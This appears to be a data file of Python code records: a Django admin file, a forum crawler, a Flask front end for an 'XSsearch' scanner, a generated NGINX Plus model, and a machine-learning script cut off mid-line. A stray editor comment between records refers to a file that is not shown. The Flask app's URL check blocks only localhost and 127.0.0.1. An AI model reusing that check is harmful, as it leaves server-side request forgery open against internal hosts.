+{"seq_id":"430341788","text":"\"\"\"Contains settings for the admin page.\"\"\"\n\nfrom django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin\nfrom .models import Game, Player, User\n\n\n@admin.register(Game)\nclass GameAdmin(admin.ModelAdmin):\n    \"\"\"Settings for Game model on admin page.\"\"\"\n\n    list_display = (\n        \"datetime_played\",\n        \"winner\",\n        \"loser\",\n        \"winner_score\",\n        \"loser_score\",\n    )\n\n\n@admin.register(Player)\nclass PlayerAdmin(admin.ModelAdmin):\n    \"\"\"Settings for Player model on admin page.\"\"\"\n\n    list_display = (\"name\",)\n\n\n# Register custom user model\nadmin.site.register(User, UserAdmin)\n","sub_path":"backend/api/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
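# Editor's note on data_compiler.py above (worked example, not part of the dataset):\n#   sumnested({'a': 1}, {'a': 2, 'b': {'c': 3}})  ->  {'a': 3, 'b': {'c': 3}}\n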
 +{"seq_id":"165387485","text":"#coding:utf-8\r\nimport sys, os\r\n\r\nimport gevent\r\nfrom gevent import monkey, pool; monkey.patch_all()\r\n\r\nfrom bs4 import BeautifulSoup\r\n\r\nimport re\r\n\r\nimport pymysql.cursors\r\nimport redis\r\nfrom datetime import datetime\r\n\r\nimport timeit\r\nimport requests\r\nimport gc\r\nimport traceback\r\n\r\n# import refactor.py from the current folder\r\nsys.path.append(os.getcwd())\r\nimport refactor as ref\r\nimport config as conf\r\n\r\ndef Main():\r\n\r\n    # start crawling from the first page\r\n    pageNum = 1\r\n\r\n    ses = ref.Login()\r\n    p = pool.Pool(20)\r\n    jobs = [p.spawn(CrawlPage, ses, threadid, pageNum) for threadid in range(conf.tid_range['start'],conf.tid_range['end'],conf.tid_range['step'])]\r\n    gevent.joinall(jobs, 60)\r\n    # CrawlPage(ses, 1876842, pageNum)\r\n\r\n\r\ndef CrawlPage(ses, threadid, pageNum):\r\n    ref.FramePrint('tid %d page %d start at: %s' %\r\n          (threadid, pageNum, datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")))\r\n\r\n    cache = redis.StrictRedis(conf.redis['server'], conf.redis['port'])\r\n\r\n    try:\r\n        tsoup = Browser(ses, threadid, pageNum)\r\n    except:\r\n        # on error, push this page onto the 'error' queue\r\n        key = 'error'\r\n        value = {'threadid': threadid,\r\n                 'pageNum': pageNum}\r\n        cache.lpush(key, value)\r\n        ref.FramePrint('this tid %d error! page %d' % (threadid, pageNum))\r\n        traceback.print_exc()\r\n    else:\r\n        # on success, push this page onto the 'page' list to await later\r\n        # stages such as parseHtml\r\n        key = 'page'\r\n        value = {'threadid': threadid,\r\n                 'pageNum': pageNum,\r\n                 'tsoup': tsoup}\r\n        cache.lpush(key, value)\r\n\r\n    ref.FramePrint('tid %d page %d end at: %s'\r\n          % (threadid,\r\n             pageNum,\r\n             datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")))\r\n    del cache\r\n\r\n\r\n\r\ndef Browser(ses, threadid, pageNum):\r\n\r\n    link = 'https://www.hi-pda.com/forum/viewthread.php?tid=%s&page=%s' % (str(threadid),str(pageNum))\r\n\r\n    headers = {\r\n        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\r\n        'Connection': 'keep-alive',\r\n        'User-Agent': \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:34.0) Gecko/20100101 Firefox/34.0\",\r\n        'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',\r\n        'Accept-Encoding': 'gzip, deflate, br'\r\n    }\r\n\r\n    resp = ses.get(link, headers=headers)\r\n    tsoup = resp.content\r\n\r\n    del resp\r\n\r\n    return tsoup\r\n\r\n\r\nif __name__ == '__main__':\r\n    Main()\r\n","sub_path":"networkOnly.py","file_name":"networkOnly.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"107233458","text":"from core import *\nfrom urllib.parse import urlparse\nfrom urllib.error import URLError, HTTPError\nfrom flask import Flask,request,render_template,url_for,redirect,g,session\nimport sqlite3\nimport hashlib\nimport json\nimport os\n\napp = Flask(__name__, static_url_path=\"/static/\", static_folder=\"./templates/static/\")\nUSER_DATABASE = 'users.db'\nREPORT_DATABASE = 'report.db'\napp.secret_key = os.urandom(24)\n\ndef vaild_url(url):\n\n\turl_scheme = urlparse(url).scheme\n\turl_domain = urlparse(url).netloc\n\n\tif(url_scheme == ''):\n\t\n\t\treturn False\n\n\tif(url_domain == ''):\n\t\n\t\treturn False\n\t\n\tif(url_scheme == 'http' or url_scheme == 'https'):\n\n\t\tif(url_domain == 'localhost' or url_domain == '127.0.0.1'):\n\n\t\t\treturn False\n\t\telse:\n\t\t\treturn url\n\n\t# any other scheme is rejected explicitly\n\treturn False\n\n
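# Editor's note (not in the original): vaild_url returns the URL itself only for http/https\n# URLs whose host is not localhost/127.0.0.1, and False otherwise, e.g.\n#   vaild_url('https://example.com/a') -> 'https://example.com/a'\n#   vaild_url('ftp://example.com')     -> False\n# The handlers below rely on this truthiness check.\n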
def load_userdb():\n\n\tif not hasattr(g, 'users.db'):\n\t\n\t\tdb = sqlite3.connect(USER_DATABASE)\n\t\n\tdb.row_factory = sqlite3.Row\n\treturn db\n\ndef load_reportdb():\n\n\tif not hasattr(g, 'report.db'):\n\n\t\tdb = sqlite3.connect(REPORT_DATABASE)\n\n\tdb.row_factory = sqlite3.Row\n\treturn db\n\n@app.teardown_appcontext\ndef close_connection(exception):\n\n\tif hasattr(g, 'users.db'):\n\n\t\tg.db.close()\n\n\n@app.route('/', methods=[\"GET\",\"POST\"])\ndef index():\n\n    return render_template('index.html')\n\n@app.route('/api/logout', methods=[\"GET\"])\ndef logout():\n\n\tif session.get('user') == None:\n\n\t\treturn json.dumps({'success':\"false\", \"msg\":\"You are not logged in\"})\n\n\tsession.pop('user', None)\n\treturn json.dumps({\"success\":\"true\", \"msg\":\"Logout Success\"})\n\n\n@app.route('/api/login', methods=[\"POST\"])\ndef login():\n\n\tif session.get('user') != None:\n\n\t\treturn json.dumps({'success':\"false\",\"msg\":\"You are already logged in\"})\n\n\tusername = request.form.get('username')\n\tpassword = request.form.get('password')\n\n\tdb = load_userdb()\n\tcursor = db.cursor()\n\tquery = cursor.execute(\"SELECT username FROM users where username = ? AND password = ?\", (username, hashlib.sha256(password.encode()).hexdigest())).fetchone()\n\n\tif query:\n\t\n\t\tsession['user'] = query['username']\n\t\treturn json.dumps({\"success\":\"true\",\"msg\":\"Login Success\"});\n\n\telse:\n\n\t\treturn json.dumps({\"success\":\"false\",\"msg\":\"Login failed\"});\n\n\n@app.route('/api/register', methods=[\"POST\"])\ndef register():\n\n\tif session.get('user') != None:\n\n\t\treturn json.dumps({'success':\"false\",\"msg\":\"You are already logged in\"})\n\n\tusername = request.form.get('username')\n\tpassword = request.form.get('password')\n\n\tdb = load_userdb()\n\tcursor = db.cursor()\n\tquery = cursor.execute(\"SELECT * FROM users where username = ?\", (username,)).fetchone()\n\n\tif query:\n\n\t\treturn json.dumps({\"success\":\"false\", \"msg\": \"User already exists\"});\n\n\n\tquery2 = \"INSERT INTO users(username, password) VALUES (?,?)\"\n\tquery_exec = cursor.execute(query2, (username, hashlib.sha256(password.encode()).hexdigest()))\n\tdb.commit()\n\n\tif not query_exec:\n\t\n\t\treturn json.dumps({\"success\":\"false\",\"msg\":\"DB Error\"});\n\t\n\treturn json.dumps({\"success\":\"true\", \"msg\":\"Register Success\"});\n\n@app.route('/api/search', methods=[\"POST\"])\ndef search():\n \n\tif session.get('user') == None:\n\n\t\treturn json.dumps({'success':\"false\",\"msg\":\"You are not logged in\"})\n\t\n\turl = request.form.get('url')\n\tuse_cookie = request.form.get('use_cookie')\n\n\tcheck_url = vaild_url(url)\n\n\tif not check_url:\n\n\t\treturn json.dumps({\"success\":\"false\", \"msg\": \"Invalid URL\"})\n\n\tif(use_cookie == 'true'):\n\n\t\tcookie = request.form.get('cookie')\n\t\tparser = XSsearch(url=url,cookies=cookie)\n\t\tparser.run()\n\t\tresult = parser.result\n\t\treturn json.dumps(result)\n\n\telse:\n\n\t\tparser = XSsearch(url=url,cookies={})\n\t\tparser.run()\n\t\tresult = parser.result\n\t\treturn json.dumps(result)\n\n\n@app.route('/api/status', methods=[\"GET\"])\ndef status():\n\n\tlogined = True if session.get('user') else False\n\treturn json.dumps({\"success\":logined, \"msg\":\"Logged\"})\n\t\n\n@app.route('/api/report', methods=[\"POST\"])\ndef report():\n\n\tif session.get('user') == None:\n \n\t\treturn json.dumps({'success':\"false\",\"msg\":\"You are not logged in\"})\n\t\n\turl = request.form.get('url')\t\n\n\tif not vaild_url(url):\n\t\n\t\treturn json.dumps({\"success\":\"false\",\"msg\":\"Invalid URL\"})\n\t\n\t\n\tusername = session.get('user')\n\tdb = load_reportdb() \n\tcursor = db.cursor()\n\t\n\tquery = \"INSERT INTO report(username, url) VALUES (?,?)\"\n\tquery_exec = cursor.execute(query, (username, 
url))\n\tdb.commit()\n\n\tif not query_exec:\n\n\t\treturn json.dumps({\"success\":\"false\",\"msg\":\"DB Error\"})\n\t\n\treturn json.dumps({\"success\":\"true\", \"msg\":\"Report Success\"})\n\n\napp.run('0.0.0.0',8080)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"6755795","text":"# coding: utf-8\n\n\"\"\"\n NGINX Plus REST API\n\n NGINX Plus REST [API](https://nginx.org/en/docs/http/ngx_http_api_module.html) provides access to NGINX Plus status information, on-the-fly configuration of upstream servers and key-value pairs management for [http](https://nginx.org/en/docs/http/ngx_http_keyval_module.html) and [stream](https://nginx.org/en/docs/stream/ngx_stream_keyval_module.html). # noqa: E501\n\n OpenAPI spec version: 2.0\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom nginxplus.models.nginx_http_upstream_peer_health_checks import NginxHTTPUpstreamPeerHealthChecks # noqa: F401,E501\nfrom nginxplus.models.nginx_http_upstream_peer_responses import NginxHTTPUpstreamPeerResponses # noqa: F401,E501\n\n\nclass NginxHTTPUpstreamPeer(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'id': 'int',\n 'server': 'str',\n 'service': 'str',\n 'name': 'str',\n 'backup': 'bool',\n 'weight': 'int',\n 'state': 'str',\n 'active': 'int',\n 'max_conns': 'int',\n 'requests': 'int',\n 'responses': 'NginxHTTPUpstreamPeerResponses',\n 'sent': 'int',\n 'received': 'int',\n 'fails': 'int',\n 'unavail': 'int',\n 'health_checks': 'NginxHTTPUpstreamPeerHealthChecks',\n 'downtime': 'int',\n 'downstart': 'datetime',\n 'selected': 'datetime',\n 'header_time': 'int',\n 'response_time': 'int'\n }\n\n attribute_map = {\n 'id': 'id',\n 'server': 'server',\n 'service': 'service',\n 'name': 'name',\n 'backup': 'backup',\n 'weight': 'weight',\n 'state': 'state',\n 'active': 'active',\n 'max_conns': 'max_conns',\n 'requests': 'requests',\n 'responses': 'responses',\n 'sent': 'sent',\n 'received': 'received',\n 'fails': 'fails',\n 'unavail': 'unavail',\n 'health_checks': 'health_checks',\n 'downtime': 'downtime',\n 'downstart': 'downstart',\n 'selected': 'selected',\n 'header_time': 'header_time',\n 'response_time': 'response_time'\n }\n\n def __init__(self, id=None, server=None, service=None, name=None, backup=None, weight=None, state=None, active=None, max_conns=None, requests=None, responses=None, sent=None, received=None, fails=None, unavail=None, health_checks=None, downtime=None, downstart=None, selected=None, header_time=None, response_time=None): # noqa: E501\n \"\"\"NginxHTTPUpstreamPeer - a model defined in Swagger\"\"\" # noqa: E501\n\n self._id = None\n self._server = None\n self._service = None\n self._name = None\n self._backup = None\n self._weight = None\n self._state = None\n self._active = None\n self._max_conns = None\n self._requests = None\n self._responses = None\n self._sent = None\n self._received = None\n self._fails = None\n self._unavail = None\n self._health_checks = None\n self._downtime = None\n self._downstart = None\n self._selected = None\n 
self._header_time = None\n self._response_time = None\n self.discriminator = None\n\n if id is not None:\n self.id = id\n if server is not None:\n self.server = server\n if service is not None:\n self.service = service\n if name is not None:\n self.name = name\n if backup is not None:\n self.backup = backup\n if weight is not None:\n self.weight = weight\n if state is not None:\n self.state = state\n if active is not None:\n self.active = active\n if max_conns is not None:\n self.max_conns = max_conns\n if requests is not None:\n self.requests = requests\n if responses is not None:\n self.responses = responses\n if sent is not None:\n self.sent = sent\n if received is not None:\n self.received = received\n if fails is not None:\n self.fails = fails\n if unavail is not None:\n self.unavail = unavail\n if health_checks is not None:\n self.health_checks = health_checks\n if downtime is not None:\n self.downtime = downtime\n if downstart is not None:\n self.downstart = downstart\n if selected is not None:\n self.selected = selected\n if header_time is not None:\n self.header_time = header_time\n if response_time is not None:\n self.response_time = response_time\n\n @property\n def id(self):\n \"\"\"Gets the id of this NginxHTTPUpstreamPeer. # noqa: E501\n\n The ID of the server. # noqa: E501\n\n :return: The id of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: int\n \"\"\"\n return self._id\n\n @id.setter\n def id(self, id):\n \"\"\"Sets the id of this NginxHTTPUpstreamPeer.\n\n The ID of the server. # noqa: E501\n\n :param id: The id of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: int\n \"\"\"\n\n self._id = id\n\n @property\n def server(self):\n \"\"\"Gets the server of this NginxHTTPUpstreamPeer. # noqa: E501\n\n An address of the server. # noqa: E501\n\n :return: The server of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: str\n \"\"\"\n return self._server\n\n @server.setter\n def server(self, server):\n \"\"\"Sets the server of this NginxHTTPUpstreamPeer.\n\n An address of the server. # noqa: E501\n\n :param server: The server of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: str\n \"\"\"\n\n self._server = server\n\n @property\n def service(self):\n \"\"\"Gets the service of this NginxHTTPUpstreamPeer. # noqa: E501\n\n The service parameter value of the server directive. # noqa: E501\n\n :return: The service of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: str\n \"\"\"\n return self._service\n\n @service.setter\n def service(self, service):\n \"\"\"Sets the service of this NginxHTTPUpstreamPeer.\n\n The service parameter value of the server directive. # noqa: E501\n\n :param service: The service of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: str\n \"\"\"\n\n self._service = service\n\n @property\n def name(self):\n \"\"\"Gets the name of this NginxHTTPUpstreamPeer. # noqa: E501\n\n The name of the server specified in the server directive. # noqa: E501\n\n :return: The name of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: str\n \"\"\"\n return self._name\n\n @name.setter\n def name(self, name):\n \"\"\"Sets the name of this NginxHTTPUpstreamPeer.\n\n The name of the server specified in the server directive. # noqa: E501\n\n :param name: The name of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: str\n \"\"\"\n\n self._name = name\n\n @property\n def backup(self):\n \"\"\"Gets the backup of this NginxHTTPUpstreamPeer. # noqa: E501\n\n A boolean value indicating whether the server is a backup server. 
# noqa: E501\n\n :return: The backup of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: bool\n \"\"\"\n return self._backup\n\n @backup.setter\n def backup(self, backup):\n \"\"\"Sets the backup of this NginxHTTPUpstreamPeer.\n\n A boolean value indicating whether the server is a backup server. # noqa: E501\n\n :param backup: The backup of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: bool\n \"\"\"\n\n self._backup = backup\n\n @property\n def weight(self):\n \"\"\"Gets the weight of this NginxHTTPUpstreamPeer. # noqa: E501\n\n Weight of the server. # noqa: E501\n\n :return: The weight of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: int\n \"\"\"\n return self._weight\n\n @weight.setter\n def weight(self, weight):\n \"\"\"Sets the weight of this NginxHTTPUpstreamPeer.\n\n Weight of the server. # noqa: E501\n\n :param weight: The weight of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: int\n \"\"\"\n\n self._weight = weight\n\n @property\n def state(self):\n \"\"\"Gets the state of this NginxHTTPUpstreamPeer. # noqa: E501\n\n Current state, which may be one of “up”, “draining”, “down”, “unavail”, “checking”, and “unhealthy”. # noqa: E501\n\n :return: The state of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: str\n \"\"\"\n return self._state\n\n @state.setter\n def state(self, state):\n \"\"\"Sets the state of this NginxHTTPUpstreamPeer.\n\n Current state, which may be one of “up”, “draining”, “down”, “unavail”, “checking”, and “unhealthy”. # noqa: E501\n\n :param state: The state of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: str\n \"\"\"\n allowed_values = [\"up\", \"draining\", \"down\", \"unavail\", \"checking\", \"unhealthy\"] # noqa: E501\n if state not in allowed_values:\n raise ValueError(\n \"Invalid value for `state` ({0}), must be one of {1}\" # noqa: E501\n .format(state, allowed_values)\n )\n\n self._state = state\n\n @property\n def active(self):\n \"\"\"Gets the active of this NginxHTTPUpstreamPeer. # noqa: E501\n\n The current number of active connections. # noqa: E501\n\n :return: The active of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: int\n \"\"\"\n return self._active\n\n @active.setter\n def active(self, active):\n \"\"\"Sets the active of this NginxHTTPUpstreamPeer.\n\n The current number of active connections. # noqa: E501\n\n :param active: The active of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: int\n \"\"\"\n\n self._active = active\n\n @property\n def max_conns(self):\n \"\"\"Gets the max_conns of this NginxHTTPUpstreamPeer. # noqa: E501\n\n The max_conns limit for the server. # noqa: E501\n\n :return: The max_conns of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: int\n \"\"\"\n return self._max_conns\n\n @max_conns.setter\n def max_conns(self, max_conns):\n \"\"\"Sets the max_conns of this NginxHTTPUpstreamPeer.\n\n The max_conns limit for the server. # noqa: E501\n\n :param max_conns: The max_conns of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: int\n \"\"\"\n\n self._max_conns = max_conns\n\n @property\n def requests(self):\n \"\"\"Gets the requests of this NginxHTTPUpstreamPeer. # noqa: E501\n\n The total number of client requests forwarded to this server. # noqa: E501\n\n :return: The requests of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: int\n \"\"\"\n return self._requests\n\n @requests.setter\n def requests(self, requests):\n \"\"\"Sets the requests of this NginxHTTPUpstreamPeer.\n\n The total number of client requests forwarded to this server. 
# noqa: E501\n\n :param requests: The requests of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: int\n \"\"\"\n\n self._requests = requests\n\n @property\n def responses(self):\n \"\"\"Gets the responses of this NginxHTTPUpstreamPeer. # noqa: E501\n\n\n :return: The responses of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: NginxHTTPUpstreamPeerResponses\n \"\"\"\n return self._responses\n\n @responses.setter\n def responses(self, responses):\n \"\"\"Sets the responses of this NginxHTTPUpstreamPeer.\n\n\n :param responses: The responses of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: NginxHTTPUpstreamPeerResponses\n \"\"\"\n\n self._responses = responses\n\n @property\n def sent(self):\n \"\"\"Gets the sent of this NginxHTTPUpstreamPeer. # noqa: E501\n\n The total number of bytes sent to this server. # noqa: E501\n\n :return: The sent of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: int\n \"\"\"\n return self._sent\n\n @sent.setter\n def sent(self, sent):\n \"\"\"Sets the sent of this NginxHTTPUpstreamPeer.\n\n The total number of bytes sent to this server. # noqa: E501\n\n :param sent: The sent of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: int\n \"\"\"\n\n self._sent = sent\n\n @property\n def received(self):\n \"\"\"Gets the received of this NginxHTTPUpstreamPeer. # noqa: E501\n\n The total number of bytes received from this server. # noqa: E501\n\n :return: The received of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: int\n \"\"\"\n return self._received\n\n @received.setter\n def received(self, received):\n \"\"\"Sets the received of this NginxHTTPUpstreamPeer.\n\n The total number of bytes received from this server. # noqa: E501\n\n :param received: The received of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: int\n \"\"\"\n\n self._received = received\n\n @property\n def fails(self):\n \"\"\"Gets the fails of this NginxHTTPUpstreamPeer. # noqa: E501\n\n The total number of unsuccessful attempts to communicate with the server. # noqa: E501\n\n :return: The fails of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: int\n \"\"\"\n return self._fails\n\n @fails.setter\n def fails(self, fails):\n \"\"\"Sets the fails of this NginxHTTPUpstreamPeer.\n\n The total number of unsuccessful attempts to communicate with the server. # noqa: E501\n\n :param fails: The fails of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: int\n \"\"\"\n\n self._fails = fails\n\n @property\n def unavail(self):\n \"\"\"Gets the unavail of this NginxHTTPUpstreamPeer. # noqa: E501\n\n How many times the server became unavailable for client requests (state “unavail”) due to the number of unsuccessful attempts reaching the max_fails threshold. # noqa: E501\n\n :return: The unavail of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: int\n \"\"\"\n return self._unavail\n\n @unavail.setter\n def unavail(self, unavail):\n \"\"\"Sets the unavail of this NginxHTTPUpstreamPeer.\n\n How many times the server became unavailable for client requests (state “unavail”) due to the number of unsuccessful attempts reaching the max_fails threshold. # noqa: E501\n\n :param unavail: The unavail of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: int\n \"\"\"\n\n self._unavail = unavail\n\n @property\n def health_checks(self):\n \"\"\"Gets the health_checks of this NginxHTTPUpstreamPeer. # noqa: E501\n\n\n :return: The health_checks of this NginxHTTPUpstreamPeer. 
# noqa: E501\n :rtype: NginxHTTPUpstreamPeerHealthChecks\n \"\"\"\n return self._health_checks\n\n @health_checks.setter\n def health_checks(self, health_checks):\n \"\"\"Sets the health_checks of this NginxHTTPUpstreamPeer.\n\n\n :param health_checks: The health_checks of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: NginxHTTPUpstreamPeerHealthChecks\n \"\"\"\n\n self._health_checks = health_checks\n\n @property\n def downtime(self):\n \"\"\"Gets the downtime of this NginxHTTPUpstreamPeer. # noqa: E501\n\n Total time the server was in the “unavail”, “checking”, and “unhealthy” states. # noqa: E501\n\n :return: The downtime of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: int\n \"\"\"\n return self._downtime\n\n @downtime.setter\n def downtime(self, downtime):\n \"\"\"Sets the downtime of this NginxHTTPUpstreamPeer.\n\n Total time the server was in the “unavail”, “checking”, and “unhealthy” states. # noqa: E501\n\n :param downtime: The downtime of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: int\n \"\"\"\n\n self._downtime = downtime\n\n @property\n def downstart(self):\n \"\"\"Gets the downstart of this NginxHTTPUpstreamPeer. # noqa: E501\n\n The time (in milliseconds since Epoch) when the server became “unavail”, “checking”, or “unhealthy”. # noqa: E501\n\n :return: The downstart of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: datetime\n \"\"\"\n return self._downstart\n\n @downstart.setter\n def downstart(self, downstart):\n \"\"\"Sets the downstart of this NginxHTTPUpstreamPeer.\n\n The time (in milliseconds since Epoch) when the server became “unavail”, “checking”, or “unhealthy”. # noqa: E501\n\n :param downstart: The downstart of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: datetime\n \"\"\"\n\n self._downstart = downstart\n\n @property\n def selected(self):\n \"\"\"Gets the selected of this NginxHTTPUpstreamPeer. # noqa: E501\n\n The time (in milliseconds since Epoch) when the server was last selected to process a request. # noqa: E501\n\n :return: The selected of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: datetime\n \"\"\"\n return self._selected\n\n @selected.setter\n def selected(self, selected):\n \"\"\"Sets the selected of this NginxHTTPUpstreamPeer.\n\n The time (in milliseconds since Epoch) when the server was last selected to process a request. # noqa: E501\n\n :param selected: The selected of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: datetime\n \"\"\"\n\n self._selected = selected\n\n @property\n def header_time(self):\n \"\"\"Gets the header_time of this NginxHTTPUpstreamPeer. # noqa: E501\n\n The average time to get the response header from the server. # noqa: E501\n\n :return: The header_time of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: int\n \"\"\"\n return self._header_time\n\n @header_time.setter\n def header_time(self, header_time):\n \"\"\"Sets the header_time of this NginxHTTPUpstreamPeer.\n\n The average time to get the response header from the server. # noqa: E501\n\n :param header_time: The header_time of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: int\n \"\"\"\n\n self._header_time = header_time\n\n @property\n def response_time(self):\n \"\"\"Gets the response_time of this NginxHTTPUpstreamPeer. # noqa: E501\n\n The average time to get the full response from the server. # noqa: E501\n\n :return: The response_time of this NginxHTTPUpstreamPeer. 
# noqa: E501\n :rtype: int\n \"\"\"\n return self._response_time\n\n @response_time.setter\n def response_time(self, response_time):\n \"\"\"Sets the response_time of this NginxHTTPUpstreamPeer.\n\n The average time to get the full response from the server. # noqa: E501\n\n :param response_time: The response_time of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: int\n \"\"\"\n\n self._response_time = response_time\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, NginxHTTPUpstreamPeer):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","sub_path":"nginxplus/models/nginx_http_upstream_peer.py","file_name":"nginx_http_upstream_peer.py","file_ext":"py","file_size_in_byte":23122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"385208642","text":"# $ python3 newcomer3_6.py fukunishi_data.csv\n\nimport warnings\nwarnings.simplefilter('ignore')\n\nimport sys\nimport math\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom rdkit import Chem, DataStructs\nfrom rdkit.Chem import AllChem, Descriptors, Descriptors3D\nfrom rdkit.ML.Descriptors import MoleculeDescriptors\nfrom RDKit_calc import RDKit_calculator\n\nfrom sklearn import *\nfrom sklearn.linear_model import *\nfrom sklearn.ensemble import RandomForestRegressor as RFR\nfrom sklearn.metrics import mean_squared_error, r2_score\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import KFold\n\nimport lightgbm as lgb\nimport optuna\n# import optuna.integration.lightgbm as olgb\n\n#*================================================*\n#Prepare for searching hyper parameter \n\ndef result_reg(reg):\n\treg.fit(X_train, y_train)\n\ty_pred = reg.predict(X_test)\n\tprint('#---------------------------------------#')\n\tprint('RMSE : ' + str(math.sqrt(mean_squared_error(y_test, y_pred))))\n\tprint('Q^2 : ' + str(r2_score(y_test, y_pred)))\n\tprint('#---------------------------------------#')\n\ndef objective_Ridge(trial):\n\talpha = trial.suggest_loguniform('alpha', 1e-4, 15)\n\tmax_iter = trial.suggest_loguniform('max_iter', 1, 1000)\n\n\treg = Ridge(alpha=alpha,\n\t\t\t max_iter=max_iter)\n\n\tkf = KFold(n_splits=4, shuffle=True, random_state=0)\n\tRMSE = []\n\tfor tr_index, val_index in kf.split(X_train, y_train):\n\t\tX_tr, X_val = X_train[tr_index], X_train[val_index]\n\t\ty_tr, y_val = y_train[tr_index], y_train[val_index]\n\t\treg.fit(X_tr, y_tr)\n\t\ty_pr = 
reg.predict(X_val)\n\t\tRMSE.append(math.sqrt(mean_squared_error(y_val, y_pr)))\n\treturn np.array(RMSE).mean()\n\ndef objective_BRidge(trial):\n\talpha_1 = trial.suggest_loguniform('alpha_1', 1e-8, 1e-4)\n\talpha_2 = trial.suggest_loguniform('alpha_2', 1e-8, 1e-4)\n\tlambda_1 = trial.suggest_loguniform('lambda_1', 1e-8, 1e-4)\n\tlambda_2 = trial.suggest_loguniform('lambda_2', 1e-8, 1e-4)\n\tn_iter = trial.suggest_int('n_iter', 1, 500)\n\n\treg = BayesianRidge(alpha_1=alpha_1,\n\t\t\t\t\t\talpha_2=alpha_2,\n\t\t\t\t\t\tlambda_1=lambda_1,\n\t\t\t\t\t\tlambda_2=lambda_2,\n\t\t\t\t\t n_iter=n_iter)\n\n\tkf = KFold(n_splits=4, shuffle=True, random_state=0)\n\tRMSE = []\n\tfor tr_index, val_index in kf.split(X_train, y_train):\n\t\tX_tr, X_val = X_train[tr_index], X_train[val_index]\n\t\ty_tr, y_val = y_train[tr_index], y_train[val_index]\n\t\treg.fit(X_tr, y_tr)\n\t\ty_pr = reg.predict(X_val)\n\t\tRMSE.append(math.sqrt(mean_squared_error(y_val, y_pr)))\n\treturn np.array(RMSE).mean()\n\ndef objective_SVR(trial):\n\tkernel = trial.suggest_categorical('kernel', ['linear', 'poly', 'rbf', 'sigmoid'])\n\tgamma = 